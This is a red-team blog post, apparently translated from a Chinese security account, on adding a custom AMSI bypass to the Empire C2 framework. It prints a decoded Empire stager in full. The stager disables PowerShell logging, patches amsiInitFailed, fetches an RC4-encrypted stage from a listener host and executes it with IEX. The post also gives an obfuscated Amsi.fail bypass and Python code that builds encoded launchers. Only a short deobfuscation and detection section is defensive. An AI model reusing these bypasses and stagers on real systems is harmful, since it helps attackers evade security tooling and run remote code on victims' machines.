
Building a custom Empire bypass module to get past AMSI

Browsing Twitter today I saw someone bypass AMSI with a custom Empire module; the post is here: https://twitter.com/_vinnybod/status/1386442836417994752

Unfortunately the tweet gives no details, so I tried it myself and wrote up the process. At the time of writing the latest Empire release is 3.8.2, so the test environment is that GitHub release, downloaded from:

https://github.com/BC-SECURITY/Empire/releases/tag/v3.8.2

Installation is skipped here; Empire ships its own install script and the setup is a one-click affair. We use the basic http listener as the example.

The listener's options are listed, including the newly added jitter and profile options. Start it and generate the PowerShell launcher:

powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBpAE8ATgBU…

Base64-decoded (UTF-16LE, which is what `-enc` expects), the launcher reads as follows; the captured copy starts mid-statement, so the opening of the stager is not shown:

('cachedGroupPolicySettings','N'+'onPublic,Static');IF($bE2E3){$8fA1B=$BE2e3.GETVALUE($nUlL);
If($8fA1b['ScriptB'+'lockLogging']){$8FA1b['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$8fa1b['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}
$Val=[CoLlEctiONs.GeNEric.DIctIonARY[sTRINg,SyStEm.ObJect]]::neW();
$VAL.ADd('EnableScriptB'+'lockLogging',0);$VAL.Add('EnableScriptBlockInvocationLogging',0);
$8fa1B['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElSe{[ScRiptBLOck]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUe($NUlL,(NEw-OBJeCT CollEctions.GENeRic.HasHSET[STRiNg]))}
$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');
$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);
};
[SySTem.NET.SeRVicEPOinTMANaGER]::ExPeCt100ConTInUe=0;
$E6CC5=NeW-OBJect SySTEM.NET.WeBCLIeNT;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([TExT.ENcoDIng]::UniCOde.GETSTRInG([COnverT]::FRomBase64StRIng('aAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADEAMQA0ADoANAA0ADQANAA=')));
$t='/news.php';
$E6Cc5.HEadeRS.AdD('User-Agent',$u);
$E6cc5.PrOxY=[SySTEM.NeT.WEbReqUeST]::DeFAuLtWEbPRoxy;
$E6Cc5.PrOXy.CReDEntIALs = [SYSTeM.NeT.CREdentiaLCACHE]::DefAULtNETWoRkCREdeNtIals;
$Script:Proxy = $e6cc5.Proxy;
$K=[SYSTEM.TEXt.ENcoding]::ASCII.GetBYtEs('2?U4PZ^CKp([->Q*+d/BSc,TG3NwHEyk');
$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};
$e6cc5.HEADers.AdD("Cookie","vFsRTxcHms=DFvQHGqcGgEXEvG4cGE4VpRZkO4=");
$DATA=$E6cC5.DownLOADDAtA($sER+$T);
$iV=$dAtA[0..3];
$DAta=$DaTA[4..$DATA.lenGtH];
-JOIn[CHar[]](& $R $daTa ($IV+$K))|IEX

We don't need to follow every line; it is enough to know that this launcher gets blocked. In outline it turns off script block logging through cachedGroupPolicySettings, flips `AmsiUtils.amsiInitFailed` through reflection, then downloads the next stage from the listener and RC4-decrypts it with the key in `$K` before piping it to `IEX`. The stock AMSI bypass in the middle, with its type and field names merely split into `'Amsi'+'Utils'` and `'amsiInitF'+'ailed'`, is widely signatured, which is why the whole launcher is caught.

The simplest route is to let the Amsi.fail generator (amsi.fail) produce the bypass for us.

For example (Amsi.fail output; the copy on the page broke off at `.Set`, and the call is completed here to `.SetValue($null,$true)`, the same reflection write the stock stager performs):

[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+
$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+
'Utils').GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+
[char](211-96)+[cHaR](149-44))+'InitFailed',$([CHaR]([byTe]0x4E)+
[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)+
[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+
[ChAR]([BYtE]0x69)+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+
[ChAR]([Byte]0x53)+[cHAR](116)+[ChAR](97)+[chaR]([BytE]0x74)+
[Char](68+37)+[cHAr](78+21))).SetValue($null,$true)

The character arithmetic resolves to the field name `amsiInitFailed` and the binding flags `NonPublic,Static`, and `HtmlDecode('Amsi')` simply returns `Amsi`, so the statement does exactly what the stock bypass does; only the string literals that signatures key on are gone.

Run it in this form and it is no longer blocked:

In Empire the bypasses prepended to a launcher are chosen with `set` on the stager (the `Bypasses` option, a space-separated list), and the bypass snippets themselves live in a single Python file.

The file is located at:

/lib/common/bypasses.py

Add the bypass we just generated to that file. To keep the traffic less conspicuous we also change a few of the listener's settings.

Then generate the launcher again, execute it on the target, and we get a session:
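As an added illustration (my own code, not Empire's), the following Python models the step above from both the operator's and the defender's side: one function per bypass, the way lib/common/bypasses.py organises them; a launcher assembled by prepending the bypasses named in a space-separated list, the shape the stager's `set Bypasses` option takes; the UTF-16LE base64 that `-enc` expects; and a small normaliser that folds the `[char]` arithmetic and `'a'+'b'` splitting back into plain literals so you can see what a bypass really resolves to. The stock bypass text is taken from the decoded stager above and the custom one from the Amsi.fail output; the function names, the simplified launcher assembly and the list of signatured literals are my assumptions.

```python
"""Model of the custom-bypass step: bypass registry, launcher assembly, and a
normaliser that undoes string-level obfuscation.  Added example, not Empire's
own code; names and the literal list below are assumptions."""
import base64
import re


def stock_bypass():
    # The AMSI part of the decoded stager above: type and field names are only
    # split with '+' (a pattern that is itself widely signatured).
    return ("$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');"
            "$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);")


def amsifail_bypass():
    # The Amsi.fail output above as one statement: every name is built from
    # [char] arithmetic, so no signatured literal appears in clear text.
    return (
        "[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+"
        "$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+'Utils')"
        ".GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+[char](211-96)+[cHaR](149-44))"
        "+'InitFailed',$([CHaR]([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)"
        "+[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+[ChAR]([BYtE]0x69)"
        "+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+[ChAR]([Byte]0x53)+[cHAR](116)+[ChAR](97)"
        "+[chaR]([BytE]0x74)+[Char](68+37)+[cHAr](78+21))).SetValue($null,$true);"
    )


# Registry in the style of bypasses.py: name -> function returning PowerShell.
BYPASSES = {"stock": stock_bypass, "amsifail": amsifail_bypass}


def build_launcher(stager, bypasses):
    """Prepend the named bypasses (space separated, like `set Bypasses`) to the stager.

    Each snippet must be a complete statement ending in ';' so that plain
    concatenation still yields one valid script block.
    """
    out = []
    for name in bypasses.split():
        if name not in BYPASSES:
            raise ValueError("unknown bypass: " + name)
        body = BYPASSES[name]().strip()
        out.append(body if body.endswith(";") else body + ";")
    out.append(stager)
    return "".join(out)


def to_enc(script):
    """Encode the way powershell -enc expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def from_enc(blob):
    """Reverse of to_enc: turn a launcher's -enc argument back into text."""
    return base64.b64decode(blob).decode("utf-16-le")


# Normaliser: resolve [char](...) arithmetic, HtmlDecode of plain literals,
# $('literal') wrappers and 'a'+'b' concatenation into single string literals.
CHAR_CAST = re.compile(r"\[char\]\((?:\[byte\])?([0-9a-fx+\-*/ ]+)\)", re.IGNORECASE)
HTML_DECODE = re.compile(r"\[System\.Net\.WebUtility\]::HtmlDecode\('([^'&]*)'\)", re.IGNORECASE)
SUBEXPR_LITERAL = re.compile(r"\$\('([^']*)'\)")
LITERAL_CONCAT = re.compile(r"'([^']*)'\+'([^']*)'")


def _arith(expr):
    # Only digits, hex and one binary operator reach here (the regex limits
    # the alphabet), so this stays far away from eval().
    expr = expr.replace(" ", "")
    if expr.lower().startswith("0x"):
        return int(expr, 16)
    for op in "+-*/":
        if op in expr:
            a, b = (int(x) for x in expr.split(op, 1))
            return {"+": a + b, "-": a - b, "*": a * b, "/": a // b}[op]
    return int(expr)


def deobfuscate(ps):
    ps = CHAR_CAST.sub(lambda m: "'" + chr(_arith(m.group(1))) + "'", ps)
    ps = HTML_DECODE.sub(lambda m: "'" + m.group(1) + "'", ps)
    while True:  # each pass folds one layer of 'a'+'b' / $('a'); stop at fixpoint
        new = LITERAL_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
        new = SUBEXPR_LITERAL.sub(lambda m: "'" + m.group(1) + "'", new)
        if new == ps:
            return ps
        ps = new


# Literals present in the stock bypass that AV signatures commonly key on.
# Heuristic list of my own, not any vendor's signature set.
SIGNATURED = ("AmsiUtils", "amsiInitFailed", "amsiContext", "AmsiScanBuffer")


def suspicious_literals(ps):
    low = ps.lower()
    return [lit for lit in SIGNATURED if lit.lower() in low]


if __name__ == "__main__":
    for name, fn in BYPASSES.items():
        print(name, "raw:", suspicious_literals(fn()),
              "normalised:", suspicious_literals(deobfuscate(fn())))
    print(deobfuscate(amsifail_bypass()))
    print(to_enc(build_launcher("# stager body goes here", "amsifail"))[:40] + "...")
```

Running it makes the point of the exercise visible from both sides: a plain substring check finds nothing in either bypass as written, but after normalisation both collapse to the same `AmsiUtils.amsiInitFailed` write. For the operator that means the Amsi.fail output works only because its strings are different from the one the signatures already know, so regenerate when a sample gets caught; for the detection engineer it means matching should run on normalised script text, not on the raw launcher.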

This article is shared from the WeChat public account 鸿鹄实验室 (gh_a2210090ba3f); author: 鸿鹄实验室a


Originally published: 2021-04-28
